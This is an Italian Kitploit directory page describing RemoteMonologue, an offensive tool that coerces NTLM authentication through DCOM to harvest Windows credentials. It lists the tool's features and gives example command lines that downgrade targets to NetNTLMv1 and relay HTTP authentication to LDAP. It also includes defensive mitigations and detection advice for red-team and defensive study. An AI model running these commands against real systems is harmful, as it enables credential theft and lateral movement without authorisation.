Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RemoteMonologue — Armare DCOM per coercizioni di autenticazione NTLM | Kitploit
Strumenti/GitHubGitHub/xforcered/remotemonologue
Attacchi alle PasswordExploitMovimento LateraleRaccolta InformazioniPenetration TestingRed Teaming
GitHubxforcered/remotemonologue

RemoteMonologue

Armare DCOM per coercizioni di autenticazione NTLM

Vedi Repository
275221 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RemoteMonologue

RemoteMonologue è una tecnica di raccolta di credenziali Windows che consente il compromesso remoto degli utenti sfruttando la chiave RunAs dell'utente interattivo e forzando autenticazioni NTLM tramite DCOM.

Leggi RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions di X-Force Red per informazioni dettagliate.

Funzionalità

🔹 Coercizione dell'autenticazione tramite DCOM (-dcom)

  • Prende di mira quattro oggetti DCOM (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) per attivare un'autenticazione NTLM verso un listener specificato (-auth-to).

🔹 Credential Spraying (-spray)

  • Valida le credenziali su più sistemi catturando anche le credenziali degli utenti.

🔹 Attacco di downgrade NetNTLMv1 (-downgrade)

  • Costringe i target a utilizzare NTLMv1, rendendo più semplice il cracking e il relaying delle credenziali.

🔹 Abuso del servizio WebClient (-webclient)

  • Abilita il servizio WebClient per facilitare la coercizione dell'autenticazione basata su HTTP.

🔹 Enumerazione degli utenti (-query)

  • Identifica gli utenti con una sessione attiva sul sistema target.

Nota: Sono richiesti privilegi di amministratore locale sul sistema target.

Configurazione

root@kitploit:~
pip install impacket

Esempi

Di seguito è riportato un esempio di esecuzione di RemoteMonologue con l'attacco di downgrade NetNTLMv1 utilizzando Responder come listener. Per impostazione predefinita, se non viene specificata alcuna opzione DCOM, lo strumento utilizza l'oggetto DCOM ServerDataCollectorSet.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

Di seguito è riportato un altro esempio: questa volta l'attacco viene eseguito utilizzando l'oggetto DCOM FileSystemImage e abilitando il servizio WebClient per ottenere un'autenticazione HTTP, che viene poi inoltrata a LDAP tramite ntlmrelayx.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

Considerazioni difensive

Per proteggersi da queste tecniche e rilevarle, è possibile implementare diverse misure preventive e di rilevamento.

Misure preventive:

  1. Abilitare la firma LDAP e il channel binding: Configurare l'applicazione della firma LDAP e il channel binding sui controller di dominio per proteggere l'endpoint LDAP dagli attacchi di relay. Nota: Queste impostazioni saranno applicate per impostazione predefinita a partire da Windows Server 2025.

  2. Aggiornare alle versioni più recenti di Windows: Aggiornare i server a Windows Server 2025 e le workstation a Windows 11 versione 24H2 per mitigare gli attacchi di downgrade NetNTLM, poiché NTLMv1 è stato rimosso in queste versioni.

  3. Applicare la firma SMB: Abilitare e imporre la firma SMB sui server Windows per prevenire gli attacchi di relay SMB.

  4. Implementare policy password complesse: Applicare requisiti di password robuste per rendere più difficili gli attacchi di cracking delle password.

Opportunità di rilevamento:

  1. Monitorare l'accesso remoto agli oggetti DCOM: Tracciare l'accesso agli oggetti DCOM interessati e alle loro specifiche proprietà e metodi per identificare attività anomale.

  2. Monitorare le modifiche al registro: Monitorare le modifiche alle chiavi di registro RunAs e LmCompatibilityLevel.

  3. Tracciare l'attività del servizio WebClient: Monitorare i casi in cui il servizio WebClient viene abilitato da remoto, poiché viene utilizzato per facilitare le autenticazioni NTLM basate su HTTP.

Scarica lo strumento